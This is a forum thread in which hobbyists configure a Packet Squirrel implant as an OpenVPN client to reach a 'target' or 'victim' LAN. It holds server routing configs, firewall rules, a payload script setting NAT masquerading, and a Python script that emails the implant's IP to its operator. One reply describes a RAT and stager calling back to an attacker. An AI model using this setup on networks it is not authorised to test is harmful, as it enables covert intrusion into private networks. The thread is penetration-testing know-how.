StampeRnator Posted November 13, 2017 Share Posted November 13, 2017 Now if i use the PacketSquirrel as VPN Client i can SSH into it from another Client in this VPN. But is it also possible to put the squirrel to an LAN an get access to the entire local network? Spent 1 hour for VPN Server/Client settings but it's still didn't get it to work. Link to comment Share on other sites More sharing options...
biob Posted November 13, 2017 Share Posted November 13, 2017 Maybe do something with port forwarding on the PS? Link to comment Share on other sites More sharing options...
biob Posted November 13, 2017 Share Posted November 13, 2017 Just found this...https://superuser.com/questions/1225259/port-forwarding-from-openvpn-client-to-public-internet havent read it properly as I’m walking and trying to avoid walking into things :-) Link to comment Share on other sites More sharing options...
StampeRnator Posted November 13, 2017 Author Share Posted November 13, 2017 Hmmm...Trying it with the config like Darren mentioned in the LANTurtle Episode 1921. But on the squirrel the /etc/config/network are the settings not persistent. Would be there an solution? Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 13, 2017 Share Posted November 13, 2017 If you use the graphical (free for 2 connections) VPN then it has settings in there to make the connection from a client a gateway. It needs to know the subnet of the client though so if you do not know, you will have to do the routing by hand. Also, you have to make sure the interface that faces the victim's network is set in iptables to masquerade. The iptables stuff you can make part of the payload to configure each time for persistence. If you are using the road warrior for your script, it will have to be done by hand in the payload script for routing, you will have to add the routing to the server so it knows where that subnet is and the machine you are using will need a route to the server for that subnet so your machine knows where it is. I have not researched this deep enough but for the clients for OpenVPN on the server there is a client script folder. If you have your routes and stuff commands in there, the client that script is associated with will download that script and run it after connecting to openvpn thus all your routes and mappings can be done then. Do not know if your iptables can be in there too for masquerading the exit point on the victim network. I have the PS but have yet to dig deeply into trying stuff but if I was to put a Raspberry Pi RAT out there, this would be the procedures that would need to be taken to get a VPN tunnel to expose the victim's network. Now having a listener from your attack machine through VPN to victim network will take port forwarding because the victim that gets the stager cannot see the PS as a gateway by default, the stager needs to point to the PS and port that is forwarded so it gets back to the attacker machine and port framework is listening on. Prepare for some routing fun. Link to comment Share on other sites More sharing options...
StampeRnator Posted November 13, 2017 Author Share Posted November 13, 2017 10 minutes ago, PoSHMagiC0de said: If you use the graphical (free for 2 connections) VPN then it has settings in there to make the connection from a client a gateway. It needs to know the subnet of the client though so if you do not know, you will have to do the routing by hand. Also, you have to make sure the interface that faces the victim's network is set in iptables to masquerade. I didnt need the VPN GUI i think my config is right (If I tracert from my second "pentester" VPN Client the hop goes to the VPN IP of the PS. BUT after that there is no response. I think it's an firewall Problem of the firewall on the PS. Link to comment Share on other sites More sharing options...
StampeRnator Posted November 13, 2017 Author Share Posted November 13, 2017 Addition Info: Always using the first VPN mode (FOR_CLIENTS=0). Adding iptables prerouting in payload or /etc/firewall.user dont work. Im still thinking the Server routing etc. is correct. Link to comment Share on other sites More sharing options...
StampeRnator Posted November 13, 2017 Author Share Posted November 13, 2017 Is this Feature planned for the future? Else i try it until it works :D Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 13, 2017 Share Posted November 13, 2017 Try the masquerading with your iptables. You might can just masquerade with no interface and it will work like you do with sharing INet with Pineapple and BB through *Nix systems. iptables -A POSTROUTING -t nat -j MASQUERADE I know if I share inet with my pi Zero W I do not need to directly add a iptable to either the pi nor the host machine to nat traffic specifically from one to the other to share inet. I just need to make sure ip forwarding is enabled on the host machine, a default route is present or routes for subnets I want to forward to and masquerading for the nat table is set on the host. Default gateway needs to be on the Pi also pointing to the IP of the host it is connected to. So, I am turning my host machine into a router for the pi. So, you need the ping to look like it came from the PS with masquerade. Without it, I believe it sees it is from that IP of the machine which the machines on the network do not know where that is since their gateway is the router for the network, not the PS that contains the route. This also means you need to be running in a mode that the PS gets its own IP too. Link to comment Share on other sites More sharing options...
Lux Æterna Posted November 13, 2017 Share Posted November 13, 2017 Hey @StampeRnator, I detailed my solution to your problem here, hope this helps! Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 13, 2017 Share Posted November 13, 2017 17 minutes ago, Lux Æterna said: Hey @StampeRnator, I detailed my solution to your problem here, hope this helps! I didn't even see that. I typed all that crap out for nothing. Welp, now I know where the client script folder goes on a non-graphical VPN connection. For everyone who followed this. This is how the graphical OpenVPN does the routing behind the scenes when you create clients. So if you wanted to get creative you could edit that roadwarrior script, or that other one I posted somewhere that has extra encryption options on it, to include a config section for the route configs/ccd configs. Might want to include a check to make sure you do not have duplicate subnets anywhere (grep file for same subnets or subnets within a super subnet...etc.) Link to comment Share on other sites More sharing options...
StampeRnator Posted November 14, 2017 Author Share Posted November 14, 2017 Now i write down my config for this maybe it can be optimized (i'm only an scriptkiddie :P) :D My VPN Network: 10.9.0.0/24 My Target Network: 192.168.1.0/24 First VPN Server Config: Like @Lux Æterna mentioned following config for the non GUI Version and roadwarrior script VPN Server "server.conf": client-config-dir ccd # The ccd only works for me, otherwise "/etc/openvpn/ccd" also works client-to-client push "route 192.168.1.0 255.255.255.0" # Your target IP Subnet route 192.168.1.0 255.255.255.0 # Not sure if needed, i read this is only needed if you want to get access from the VPN Server to the target network push "route 192.168.0.0 255.255.255.0" # Your target IP Subnet route 192.168.0.0 255.255.255.0 # Not sure if needed, i read this is only needed if you want to get access from the VPN Server to the target network push "route 10.0.0.0 255.255.255.0" # Your target IP Subnet route 10.0.0.0 255.255.255.0 # Not sure if needed, i read this is only needed if you want to get access from the VPN Server to the target network management 127.0.0.1 5555 # optional if you want to use an VPN status page If you want to add some more IP Subnets you have to add the "push" and "route" line for every Subnet. Now the ccd magic. Create a folder "ccd" in /etc/openvpn and cd into it. So now you are in the directory "/etc/openvpn/ccd". When you are in there create a file that is called the same you created the client.ovpn with the roadwarrior script (default is client). Content of the file "/etc/openvpn/ccd/client": ifconfig-push 10.9.0.2 255.255.255.0 # This always gaves the Squirrel the IP address 10.9.0.2. I use the 10.9.0.0/24 VPN IP Subnet, default is 10.8.0.0 so in this case it is 10.8.0.2 iroute 192.168.1.0 255.255.255.0 # Your Target IP Subnet iroute 192.168.0.0 255.255.255.0 # Your Second Target IP Subnet iroute 10.0.0.0 255.255.255.0 # Your Third Target IP Subnet Now the Squirrel Config: First add this on the end of "/etc/config/firewall": broken atm...looking for this. Now my payload.sh: #!/bin/bash # OpenVPN payload # Set to 1 to allow clients to use the VPN FOR_CLIENTS=0 DNS_SERVER="8.8.8.8" # Cheap hack to set the DNS server function setdns() { while true do [[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && { echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/res$ } sleep 5 done } function start() { LED SETUP DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd) # Set NETMODE to BRIDGE and wait 3 seconds # to ensure that things can settle [[ "$FOR_CLIENTS" == "1" ]] && { /usr/bin/NETMODE VPN } || { /usr/bin/NETMODE BRIDGE } sleep 3 # Make OpenVPN use the local configuration uci set openvpn.vpn.config="${DIR}/config.ovpn" uci commit # Start the OpenVPN server in the background /etc/init.d/openvpn start # Start SSH Server /etc/init.d/sshd start & # Set DNS server setdns & # Set iptables for access to entire network (For me only this did the trick). If not for you maybe try to uncomment the optional iptables line iptables -A POSTROUTING -t nat -j MASQUERADE # OPTIONAL uncomment and change to your needs # iptables -t nat -A POSTROUTING -o eth1 -s 10.9.0.0/24 -j MASQUERADE LED ATTACK } # Start the payload start & Optional VPN Status Page: For this you have added the "management 127.0.0.1 5555" to your "server.conf". The Script is located here: https://pastebin.com/U9SESPB0 If you have an Webserver on the VPN Server you can show the connected Clients and traffic of the VPN. Just put this into an "vpnstatus.php" on your webserver. If you use PHP 5.x this script is exactly right. If you use PHP 7 replace "split" with "explode". Much thanks to @Lux Æterna, @PoSHMagiC0de and the writer of the VPN status Page AND of course @Darren Kitchen for Developing this awesome Squirrel. Without you i couldn't get it to work. #micdrop Link to comment Share on other sites More sharing options...
StampeRnator Posted November 14, 2017 Author Share Posted November 14, 2017 If you don't know the IP Subnet of your target Network i have taken a small python script that i used on my RPi (yay the Squirrel likes Python) to EMail me the actual IP address of the device. If you know the IP you can change the routing settings on the server and after the reconnect of the OpenVPN Client you can access the network. If you want this i can put this to github. I put following file to the switch folder "payloads/switch3/mailip.py" (Just GMail works as sender): __author__ = 'Cody Giles' __license__ = "Creative Commons Attribution-ShareAlike 3.0 Unported License" __version__ = "1.0" __maintainer__ = "Cody Giles" __status__ = "Production" import subprocess import smtplib from email.mime.text import MIMEText import datetime def connect_type(word_list): """ This function takes a list of words, then, depeding which key word, returns the corresponding internet connection type as a string. ie) 'ethernet'. """ if 'wlan0' in word_list or 'wlan1' in word_list: con_type = 'wifi' elif 'eth0' in word_list: con_type = 'ethernet' else: con_type = 'current' return con_type # Change to your own account information # Account Information to = 'your@mail.com' # Email to send to. gmail_user = 'yourgmail@gmail.com' # Email to send from. (MUST BE GMAIL) gmail_password = 'mailpassword' # Gmail password. smtpserver = smtplib.SMTP('smtp.gmail.com', 587) # Server to use. smtpserver.ehlo() # Says 'hello' to the server smtpserver.starttls() # Start TLS encryption smtpserver.ehlo() smtpserver.login(gmail_user, gmail_password) # Log in to server today = datetime.date.today() # Get current time/date arg='ip route list' # Linux command to retrieve ip addresses. # Runs 'arg' in a 'hidden terminal'. p=subprocess.Popen(arg,shell=True,stdout=subprocess.PIPE) data = p.communicate() # Get data from 'p terminal'. # Split IP text block into three, and divide the two containing IPs into words. ip_lines = data[0].splitlines() split_line_a = ip_lines[0].split() # con_type variables for the message text. ex) 'ethernet', 'wifi', etc. ip_type_a = connect_type(split_line_a) """Because the text 'src' is always followed by an ip address, we can use the 'index' function to find 'src' and add one to get the index position of our ip. """ ipaddr_a = split_line_a[split_line_a.index('src')+1] # Creates a sentence for each ip address. my_ip_a = 'Your %s ip is %s' % (ip_type_a, ipaddr_a) # Creates the text, subject, 'from', and 'to' of the message. msg = MIMEText(my_ip_a) msg['Subject'] = 'IPs For RaspberryPi on %s' % today.strftime('%b %d %Y') msg['From'] = gmail_user msg['To'] = to # Sends the message smtpserver.sendmail(gmail_user, [to], msg.as_string()) # Closes the smtp server. smtpserver.quit() Don't forget to chmod +x to the mailip.py Then just add following to your payload: # Set iptables for access to entire network iptables -A POSTROUTING -t nat -j MASQUERADE python ${DIR}/mailip.py LED ATTACK And that's it. #doublemicdrop Link to comment Share on other sites More sharing options...
StampeRnator Posted November 14, 2017 Author Share Posted November 14, 2017 6 hours ago, StampeRnator said: Now the Squirrel Config: First add this on the end of "/etc/config/firewall": broken atm...looking for this. Okay. Only with the following on the end of "/etc/config/firewall" works the connection to the Packetsquirrel Network: config forwarding 'vpn' option src 'tun0' option dest 'lan' config forwarding 'vpn' option src 'lan' option dest 'tun0' If the VPN payload is startet everything on the Machine on the Network in on the Squirrel is ok (Internet Connection) But in Arming Mode there is no Internet. DNS looks to work. But to HTTP or similar. Maybe somebody has an suggestion? Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 14, 2017 Share Posted November 14, 2017 Remove the email part if you want. If the VPN is going to come up and work one way like from squirrel to server then just have it scp a file onto the server for you to look at for the network information, if you own the server. Link to comment Share on other sites More sharing options...
GrineUlf Posted May 28, 2018 Share Posted May 28, 2018 Or just SSH into the turtle, get the network information, update the client file on the server and restart the server. The PS reconnects anyway after a minute or two ? Link to comment Share on other sites More sharing options...
Kiril Miloshev Posted December 3, 2018 Share Posted December 3, 2018 Ok, i still cant make this work. No ping to the squirrel br-lan ip address or the other part of the target network. Have tried all of the above. Any ideas? Link to comment Share on other sites More sharing options...
INFOTRACE Posted August 4, 2019 Share Posted August 4, 2019 On 12/3/2018 at 3:32 PM, Kiril Miloshev said: Ok, i still cant make this work. No ping to the squirrel br-lan ip address or the other part of the target network. Have tried all of the above. Any ideas? Hi Kiril, Did you resolve the issues back in 2018 and if so how? Would you recommend the device? Cheers 😎 Link to comment Share on other sites More sharing options...
BRS Chief Scientist Posted November 21, 2019 Share Posted November 21, 2019 On 11/13/2017 at 1:06 PM, PoSHMagiC0de said: If you use the graphical (free for 2 connections) VPN then it has settings in there to make the connection from a client a gateway. It needs to know the subnet of the client though so if you do not know, you will have to do the routing by hand. Also, you have to make sure the interface that faces the victim's network is set in iptables to masquerade. The iptables stuff you can make part of the payload to configure each time for persistence. If you are using the road warrior for your script, it will have to be done by hand in the payload script for routing, you will have to add the routing to the server so it knows where that subnet is and the machine you are using will need a route to the server for that subnet so your machine knows where it is. I have not researched this deep enough but for the clients for OpenVPN on the server there is a client script folder. If you have your routes and stuff commands in there, the client that script is associated with will download that script and run it after connecting to openvpn thus all your routes and mappings can be done then. Do not know if your iptables can be in there too for masquerading the exit point on the victim network. I have the PS but have yet to dig deeply into trying stuff but if I was to put a Raspberry Pi RAT out there, this would be the procedures that would need to be taken to get a VPN tunnel to expose the victim's network. Now having a listener from your attack machine through VPN to victim network will take port forwarding because the victim that gets the stager cannot see the PS as a gateway by default, the stager needs to point to the PS and port that is forwarded so it gets back to the attacker machine and port framework is listening on. Prepare for some routing fun. Thanks for the input. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.